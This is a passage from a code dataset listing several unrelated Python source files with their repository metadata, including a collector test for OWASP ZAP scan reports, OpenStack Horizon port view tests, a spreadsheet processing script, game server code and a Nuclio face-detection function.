code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
"""Unit tests for the OWASP ZAP security warnings collector."""
from collector_utilities.functions import md5_hash
from .base import OWASPZAPTestCase
class OWASPZAPSecurityWarningsTest(OWASPZAPTestCase):
"""Unit tests for the OWASP ZAP security warnings collector."""
METRIC_TYPE = "security_warnings"
OWASP_ZAP_XML = """<?xml version="1.0"?>
<OWASPZAPReport version="2.7.0" generated="Thu, 28 Mar 2019 13:20:20">
<site name="http://www.hackazon.com" host="www.hackazon.com" port="80" ssl="false">
<alerts>
<alertitem>
<pluginid>10021</pluginid>
<alert>X-Content-Type-Options Header Missing</alert>
<name>X-Content-Type-Options Header Missing</name>
<riskcode>1</riskcode>
<confidence>2</confidence>
<riskdesc>Low (Medium)</riskdesc>
<desc><p>The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'.</desc>
<instances>
<instance>
<uri>http://www.hackazon.com/products_pictures/Ray_Ban.jpg</uri>
<method>GET</method>
<param>X-Content-Type-Options</param>
</instance>
<instance>
<uri>http://www.hackazon.com/products_pictures/How_to_Marry_a_Millionaire.jpg</uri>
<method>GET</method>
<param>X-Content-Type-Options</param>
</instance>
</instances>
<count>759</count>
<solution><p>Ensure that the application/web server sets the Content-Type header appropriately</solution>
<otherinfo><p>This issue still applies to error type pages</otherinfo>
<reference><p>http://msdn.microsoft.com/en-us/library/ie/gg622941%28v</reference>
<cweid>16</cweid>
<wascid>15</wascid>
<sourceid>3</sourceid>
</alertitem>
</alerts>
</site>
</OWASPZAPReport>"""
WARNING_NAME = "X-Content-Type-Options Header Missing"
WARNING_DESCRIPTION = "The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'."
WARNING_RISK = "Low (Medium)"
async def test_alert_instances(self):
"""Test that the number of alert instances is returned."""
response = await self.collect(get_request_text=self.OWASP_ZAP_XML)
url1 = "http://www.hackazon.com/products_pictures/Ray_Ban.jpg"
url2 = "http://www.hackazon.com/products_pictures/How_to_Marry_a_Millionaire.jpg"
expected_entities = [
dict(
key=md5_hash(f"X-Content-Type-Options Header Missing:10021:16:15:GET:{url1}"),
name=self.WARNING_NAME,
description=self.WARNING_DESCRIPTION,
location=f"GET {url1}",
uri=url1,
risk=self.WARNING_RISK,
),
dict(
key=md5_hash(f"X-Content-Type-Options Header Missing:10021:16:15:GET:{url2}"),
name=self.WARNING_NAME,
description=self.WARNING_DESCRIPTION,
location=f"GET {url2}",
uri=url2,
risk=self.WARNING_RISK,
),
]
self.assert_measurement(response, value="2", entities=expected_entities)
async def test_alert_types(self):
"""Test that the number of alert types is returned."""
self.set_source_parameter("alerts", "alert types")
response = await self.collect(get_request_text=self.OWASP_ZAP_XML)
expected_entities = [
dict(
key=md5_hash("X-Content-Type-Options Header Missing:10021:16:15"),
name=self.WARNING_NAME,
description=self.WARNING_DESCRIPTION,
risk=self.WARNING_RISK,
),
]
self.assert_measurement(response, value="1", entities=expected_entities)
async def test_variable_url_regexp(self):
"""Test that parts of URLs can be ignored."""
self.set_source_parameter("variable_url_regexp", ["[A-Za-z_]+.jpg"])
response = await self.collect(get_request_text=self.OWASP_ZAP_XML)
stable_url = "http://www.hackazon.com/products_pictures/variable-part-removed"
expected_entities = [
dict(
key=md5_hash(f"X-Content-Type-Options Header Missing:10021:16:15:GET:{stable_url}"),
name=self.WARNING_NAME,
uri=stable_url,
description=self.WARNING_DESCRIPTION,
location=f"GET {stable_url}",
risk=self.WARNING_RISK,
)
]
self.assert_measurement(response, value="1", entities=expected_entities)
| ICTU/quality-time | components/collector/tests/source_collectors/owasp_zap/test_security_warnings.py | Python | apache-2.0 | 5,009 |
# Copyright 2012 NEC Corporation
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django import http
from mox3.mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
DETAIL_URL = 'horizon:admin:networks:ports:detail'
NETWORKS_INDEX_URL = reverse('horizon:admin:networks:index')
NETWORKS_DETAIL_URL = 'horizon:admin:networks:detail'
class NetworkPortTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('network_get',
'port_get',
'is_extension_supported',)})
def test_port_detail(self):
self._test_port_detail()
@test.create_stubs({api.neutron: ('network_get',
'port_get',
'is_extension_supported',)})
def test_port_detail_with_mac_learning(self):
self._test_port_detail(mac_learning=True)
def _test_port_detail(self, mac_learning=False):
port = self.ports.first()
network_id = self.networks.first().id
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(self.ports.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.MultipleTimes().AndReturn(mac_learning)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'allowed-address-pairs') \
.MultipleTimes().AndReturn(False)
api.neutron.network_get(IsA(http.HttpRequest), network_id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
res = self.client.get(reverse(DETAIL_URL, args=[port.id]))
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertEqual(res.context['port'].id, port.id)
@test.create_stubs({api.neutron: ('port_get',)})
def test_port_detail_exception(self):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
res = self.client.get(reverse(DETAIL_URL, args=[port.id]))
redir_url = NETWORKS_INDEX_URL
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get(self):
self._test_port_create_get()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',)})
def test_port_create_get_with_mac_learning(self):
self._test_port_create_get(mac_learning=True)
def _test_port_create_get(self, mac_learning=False, binding=False):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:addport',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/create.html')
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post(self):
self._test_port_create_post()
@test.create_stubs({api.neutron: ('network_get',
'is_extension_supported',
'port_create',)})
def test_port_create_post_with_mac_learning(self):
self._test_port_create_post(mac_learning=True, binding=False)
def _test_port_create_post(self, mac_learning=False, binding=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = \
port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception(self):
self._test_port_create_post_exception()
@test.create_stubs({api.neutron: ('network_get',
'port_create',
'is_extension_supported',)})
def test_port_create_post_exception_with_mac_learning(self):
self._test_port_create_post_exception(mac_learning=True)
def _test_port_create_post_exception(self, mac_learning=False,
binding=False):
network = self.networks.first()
port = self.ports.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_create(IsA(http.HttpRequest),
tenant_id=network.tenant_id,
network_id=network.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'network_name': network.name,
'name': port.name,
'admin_state': port.admin_state_up,
'mac_state': True,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_learning_enabled'] = True
url = reverse('horizon:admin:networks:addport',
args=[port.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get(self):
self._test_port_update_get()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',)})
def test_port_update_get_with_mac_learning(self):
self._test_port_update_get(mac_learning=True)
def _test_port_update_get(self, mac_learning=False, binding=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest),
port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/ports/update.html')
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post(self):
self._test_port_update_post()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_with_mac_learning(self):
self._test_port_update_post(mac_learning=True)
def _test_port_update_post(self, mac_learning=False, binding=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndReturn(port)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception(self):
self._test_port_update_post_exception()
@test.create_stubs({api.neutron: ('port_get',
'is_extension_supported',
'port_update')})
def test_port_update_post_exception_with_mac_learning(self):
self._test_port_update_post_exception(mac_learning=True, binding=False)
def _test_port_update_post_exception(self, mac_learning=False,
binding=False):
port = self.ports.first()
api.neutron.port_get(IsA(http.HttpRequest), port.id)\
.AndReturn(port)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'binding')\
.AndReturn(binding)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
extension_kwargs = {}
if binding:
extension_kwargs['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
extension_kwargs['mac_learning_enabled'] = True
api.neutron.port_update(IsA(http.HttpRequest), port.id,
name=port.name,
admin_state_up=port.admin_state_up,
device_id=port.device_id,
device_owner=port.device_owner,
binding__host_id=port.binding__host_id,
**extension_kwargs)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'network_id': port.network_id,
'port_id': port.id,
'name': port.name,
'admin_state': port.admin_state_up,
'device_id': port.device_id,
'device_owner': port.device_owner,
'binding__host_id': port.binding__host_id}
if binding:
form_data['binding__vnic_type'] = port.binding__vnic_type
if mac_learning:
form_data['mac_state'] = True
url = reverse('horizon:admin:networks:editport',
args=[port.network_id, port.id])
res = self.client.post(url, form_data)
redir_url = reverse(NETWORKS_DETAIL_URL, args=[port.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete(self):
self._test_port_delete()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_with_mac_learning(self):
self._test_port_delete(mac_learning=True)
def _test_port_delete(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'network-ip-availability').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse(NETWORKS_DETAIL_URL, args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_port_delete_exception(self):
self._test_port_delete_exception()
@test.create_stubs({api.neutron: ('port_delete',
'subnet_list',
'port_list',
'show_network_ip_availability',
'is_extension_supported',
'list_dhcp_agent_hosting_networks')})
def test_port_delete_exception_with_mac_learning(self):
self._test_port_delete_exception(mac_learning=True)
def _test_port_delete_exception(self, mac_learning=False):
port = self.ports.first()
network_id = port.network_id
api.neutron.port_delete(IsA(http.HttpRequest), port.id)\
.AndRaise(self.exceptions.neutron)
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'network-ip-availability').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
form_data = {'action': 'ports__delete__%s' % port.id}
url = reverse(NETWORKS_DETAIL_URL, args=[network_id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, url)
| wolverineav/horizon | openstack_dashboard/dashboards/admin/networks/ports/tests.py | Python | apache-2.0 | 20,198 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import xlrd
import xlwt
import datetime
def request():
sheet = xlrd.open_workbook(os.path.join('E:/w/', '修改工单.xls')).sheet_by_index(0)
nRow = sheet.nrows
nCol = sheet.ncols
title = []
rowDatas = {}
for i in range(nRow):
# 标题
if(i == 0):
for j in range(nCol):
title.append(sheet.cell_value(i, j))
else:
oneItem = []
for j in range(nCol):
oneItem.append(sheet.cell_value(i, j))
key = sheet.cell_value(i, 9)
rowData = rowDatas.get(key)
if rowData is None:
rowData = []
rowData.append(oneItem)
rowDatas[key] = rowData
else:
rowData.append(oneItem)
for key, rowData in rowDatas.items():
if(len(rowData) == 1):
for oneItem in rowData:
oneItem[25] = '未倒回'
else:
rowData.sort(key = lambda e : e[1], reverse=False)
rowData[0][25] = '未倒回'
rowData[len(rowData)-1][25] = '未倒回'
for i in range(len(rowData)-1):
if rowData[i][15] == rowData[i + 1][16]:
orgDate = datetime.datetime.strptime('{:.0f}'.format(rowData[i][1]), '%Y%m%d')
targetDate = datetime.datetime.strptime('{:.0f}'.format(rowData[i + 1][1]), '%Y%m%d')
diffDay = targetDate - orgDate
if diffDay.days >= 0 and diffDay.days <= 5:
rowData[i][25] = '已倒回'
rowData[i + 1][25] = '已倒回'
else:
rowData[i][25] = '超时倒回'
rowData[i + 1][25] = '超时倒回'
writeBook = xlwt.Workbook()
writeSheet = writeBook.add_sheet('Sheet0')
for i in range(len(title)):
writeSheet.write(0, i, title[i])
# 写数据到一个文件
rowIndex = 1
for key, rowData in rowDatas.items():
for oneItem in rowData:
for j in range(nCol):
writeSheet.write(rowIndex, j, oneItem[j])
rowIndex += 1
writeBook.save(os.path.join('E:/w/', '修改工单-结果.xlsx'))
if __name__ == '__main__':
request()
| tiandizhiguai/test | src/main/java/com/test/python/data_test4.py | Python | apache-2.0 | 2,395 |
from toontown.coghq import DistributedLevelBattleAI
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import State
from direct.fsm import ClassicFSM, State
from toontown.battle.BattleBase import *
import CogDisguiseGlobals
from toontown.toonbase.ToonPythonUtil import addListsByValue
class DistributedBattleFactoryAI(DistributedLevelBattleAI.DistributedLevelBattleAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedBattleFactoryAI')
def __init__(self, air, battleMgr, pos, suit, toonId, zoneId, level, battleCellId, roundCallback = None, finishCallback = None, maxSuits = 4):
DistributedLevelBattleAI.DistributedLevelBattleAI.__init__(self, air, battleMgr, pos, suit, toonId, zoneId, level, battleCellId, 'FactoryReward', roundCallback, finishCallback, maxSuits)
self.battleCalc.setSkillCreditMultiplier(1)
if self.bossBattle:
self.level.d_setForemanConfronted(toonId)
self.fsm.addState(State.State('FactoryReward', self.enterFactoryReward, self.exitFactoryReward, ['Resume']))
playMovieState = self.fsm.getStateNamed('PlayMovie')
playMovieState.addTransition('FactoryReward')
def getTaskZoneId(self):
return self.level.factoryId
def handleToonsWon(self, toons):
for toon in toons:
recovered, notRecovered = self.air.questManager.recoverItems(toon, self.suitsKilled, self.getTaskZoneId())
self.toonItems[toon.doId][0].extend(recovered)
self.toonItems[toon.doId][1].extend(notRecovered)
meritArray = self.air.promotionMgr.recoverMerits(toon, self.suitsKilled, self.getTaskZoneId(), getFactoryMeritMultiplier(self.getTaskZoneId()))
if toon.doId in self.helpfulToons:
self.toonMerits[toon.doId] = addListsByValue(self.toonMerits[toon.doId], meritArray)
else:
self.notify.debug('toon %d not helpful, skipping merits' % toon.doId)
if self.bossBattle:
self.toonParts[toon.doId] = self.air.cogSuitMgr.recoverPart(toon, self.level.factoryType, self.suitTrack, self.getTaskZoneId(), toons)
self.notify.debug('toonParts = %s' % self.toonParts)
def enterFactoryReward(self):
self.joinableFsm.request('Unjoinable')
self.runableFsm.request('Unrunable')
self.resetResponses()
self.assignRewards()
self.bossDefeated = 1
self.level.setVictors(self.activeToons[:])
self.timer.startCallback(BUILDING_REWARD_TIMEOUT, self.serverRewardDone)
return None
def exitFactoryReward(self):
return None
def enterResume(self):
DistributedLevelBattleAI.DistributedLevelBattleAI.enterResume(self)
if self.bossBattle and self.bossDefeated:
self.battleMgr.level.b_setDefeated()
| silly-wacky-3-town-toon/SOURCE-COD | toontown/coghq/DistributedBattleFactoryAI.py | Python | apache-2.0 | 2,839 |
#!/usr/bin/python
from light import Light
light = Light()
print light.getstate()
| bettse/hue | dump.py | Python | apache-2.0 | 82 |
"""
Copyright 2014-2016 University of Illinois
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
file: rules/tests.py
Author: Jon Gunderson
"""
from __future__ import absolute_import
from django.test import TestCase
# Create your tests here.
| opena11y/fae2 | fae2/rules/tests.py | Python | apache-2.0 | 722 |
import pytest
# Test data
# Consider a bunch of Nodes, some of them are parents and some are children.
class Node(object):
NodeMap = {}
def __init__(self, name, parent=None):
self.name = name
self.children = []
self.NodeMap[self.name] = self
if parent:
self.parent = self.NodeMap[parent]
self.parent.children.append(self)
else:
self.parent = None
def __str__(self):
return self.name
parents = [ Node("a"), Node("b"), Node("c"), Node("d"), ]
childs = [ Node("e", "a"), Node("f", "a"), Node("g", "a"),
Node("h", "b"), Node("i", "c"), Node("j", "c"),
Node("k", "d"), Node("l", "d"), Node("m", "d"), ]
# The test for the parent shall depend on the test of all its children.
# Create enriched parameter lists, decorated with the dependency marker.
childparam = [
pytest.param(c, marks=pytest.mark.dependency(name="test_child[%s]" % c))
for c in childs
]
parentparam = [
pytest.param(p, marks=pytest.mark.dependency(
name="test_parent[%s]" % p,
depends=["test_child[%s]" % c for c in p.children]
)) for p in parents
]
@pytest.mark.parametrize("c", childparam)
def test_child(c):
if c.name == "l":
pytest.xfail("deliberate fail")
assert False
@pytest.mark.parametrize("p", parentparam)
def test_parent(p):
pass
| RKrahl/pytest-dependency | doc/examples/dyn-parametrized.py | Python | apache-2.0 | 1,397 |
# -*- coding:utf-8 -*-
from application import app
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True)
| oceanio/flask-boot | server.py | Python | apache-2.0 | 130 |
# Copyright 2017 The Nuclio Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Uses Microsoft's Face API to extract face information from the
# picture whose URL is submitted in the request body. The result is
# returned as a table of face objects sorted by their center's
# position in the given picture, left-to-right and then top-to-bottom.
#
# You will need a valid key from Microsoft:
# https://azure.microsoft.com/en-gb/try/cognitive-services/?api=face-api
#
# Once a valid Face API key has been acquired, set it and the appropriate
# regional base URL as the environment for this function
# (in the config section).
#
# We can also configure the function inline - through a specially crafted
# comment such as the below. This is functionally equivalent to creating
# a function.yaml file.
import os
import cognitive_face as cf
import tabulate
import inflection
def handler(context, event):
# extract the stuff we need
image_url = event.body.decode('utf-8').strip()
key = os.environ.get('FACE_API_KEY')
base_url = os.environ.get('FACE_API_BASE_URL')
if key is None:
context.logger.warn('Face API key not set, cannot continue')
return _build_response(context, 'Function misconfigured: Face API key not set', 503)
if base_url is None:
context.logger.warn('Face API base URL not set, cannot continue')
return _build_response(context, 'Function misconfigured: Face API base URL not set', 503)
if not image_url:
context.logger.warn('No URL given in request body')
return _build_response(context, 'Image URL required', 400)
# configure cognitive face wrapper
cf.Key.set(key)
cf.BaseUrl.set(base_url)
# attempt to request using the provided info
try:
context.logger.info('Requesting detection from Face API: {0}'.format(image_url))
detected_faces = cf.face.detect(image_url,
face_id=False,
attributes='age,gender,glasses,smile,emotion')
except Exception as error:
context.logger.warn('Face API error occurred: {0}'.format(error))
return _build_response(context, 'Face API error occurred', 503)
parsed_faces = []
# determine the center point of each detected face and map it to its attributes,
# as well as clean up the retreived data for viewing comfort
for face in detected_faces:
coordinates = face['faceRectangle']
attributes = face['faceAttributes']
center_x = coordinates['left'] + coordinates['width'] / 2
center_y = coordinates['top'] + coordinates['height'] / 2
# determine the primary emotion based on its weighing
primary_emotion = sorted(attributes['emotion'].items(), key=lambda item: item[1])[-1][0]
parsed_face = {
'x': center_x,
'y': center_y,
'position': '({0},{1})'.format(int(center_x), int(center_y)),
'gender': inflection.humanize(attributes['gender']),
'age': int(attributes['age']),
'glasses': inflection.humanize(inflection.underscore(attributes['glasses'])),
'primary_emotion': inflection.humanize(primary_emotion),
'smile': '{0:.1f}%'.format(attributes['smile'] * 100),
}
parsed_faces.append(parsed_face)
# sort according to center point, first x then y
parsed_faces.sort(key=lambda face: (face['x'], face['y']))
# prepare the data for tabulation
first_row = ('',) + tuple(face['position'] for face in parsed_faces)
make_row = lambda name: (inflection.humanize(name),) + tuple(
face[name] for face in parsed_faces)
other_rows = [make_row(name) for name in [
'gender', 'age', 'primary_emotion', 'glasses', 'smile']]
# return the human-readable face data in a neat table format
return _build_response(context,
tabulate.tabulate([first_row] + other_rows,
headers='firstrow',
tablefmt='fancy_grid',
numalign='center',
stralign='center'),
200)
def _build_response(context, body, status_code):
return context.Response(body=body,
headers={},
content_type='text/plain',
status_code=status_code)
| nuclio/nuclio | hack/examples/python/facerecognizer/face.py | Python | apache-2.0 | 5,037 |
# Copyright 2014 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import mock
import os
import pytest
import requests
import requests_mock
import struct
from f5.bigip.mixins import AsmFileMixin
from f5.bigip.mixins import CommandExecutionMixin
from f5.bigip.mixins import ToDictMixin
from f5.bigip.resource import Resource
from f5.sdk_exception import EmptyContent
from f5.sdk_exception import MissingHttpHeader
from f5.sdk_exception import UnsupportedMethod
from requests import HTTPError
class MixinTestClass(ToDictMixin):
def __init__(self):
pass
def test_int():
MTCobj = MixinTestClass()
MTCobj.x = 1
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": 1}'
def test_list():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": [1, "a"]}'
def test_list_and_int():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
MTCobj.y = 1
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict, sort_keys=True) == \
'{"x": [1, "a"], "y": 1}'
def test_list_and_int_and_list2():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
MTCobj.y = 1
MTCobj.z = [1, 'a']
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict, sort_keys=True) == \
'{"x": [1, "a"], "y": 1, "z": [1, "a"]}'
def test_two_refs():
MTCobj = MixinTestClass()
MTCobj.x = [1, 'a']
MTCobj.z = MTCobj.x
mtc_as_dict = MTCobj.to_dict()
dict1 = json.dumps(mtc_as_dict, sort_keys=True)
assert dict1 ==\
'{"x": [1, "a"], "z": ["TraversalRecord", "x"]}'
def test_tuple():
MTCobj = MixinTestClass()
MTCobj.x = (1, 'a')
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": [1, "a"]}'
class ToDictMixinAttribute(ToDictMixin):
def __init__(self):
pass
def test_ToDictMixinAttribute():
MTCobj = MixinTestClass()
TDMAttrObj = ToDictMixinAttribute()
MTCobj.x = TDMAttrObj
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": {}}'
def test_ToDictMixinAttribute_Nested():
MTCobj = MixinTestClass()
TDMAttrObj = ToDictMixinAttribute()
TDMAttrObj.y = {'a': 3}
MTCobj.x = TDMAttrObj
mtc_as_dict = MTCobj.to_dict()
assert json.dumps(mtc_as_dict) == '{"x": {"y": {"a": 3}}}'
class DictableClass(object):
def __init__(self):
self.test_attribute = 42
def test_TestClass_Basic():
TDMAttrObj = ToDictMixinAttribute()
TDMAttrObj.y = DictableClass()
mtc_as_dict = TDMAttrObj.to_dict()
assert json.dumps(mtc_as_dict) == '{"y": {"test_attribute": 42}}'
class MockResponse(object):
def __init__(self, attr_dict):
self.__dict__ = attr_dict
def json(self):
return self.__dict__
class FakeCommandResource(CommandExecutionMixin, Resource):
def __init__(self, container):
super(FakeCommandResource, self).__init__(container)
self._meta_data['allowed_commands'] = ['fakecommand', 'fakecommand2']
self._meta_data['required_json_kind'] = 'tm:ltm:fakeendpoint:fakeres'
self._meta_data['allowed_lazy_attributes'] = []
mockuri = 'https://localhost/mgmt/tm/ltm/fakeendpoint/fakeres'
self._meta_data['uri'] = mockuri
self._meta_data['bigip']._meta_data[
'icr_session'].post.return_value =\
MockResponse({"generation": 0, "selfLink": mockuri,
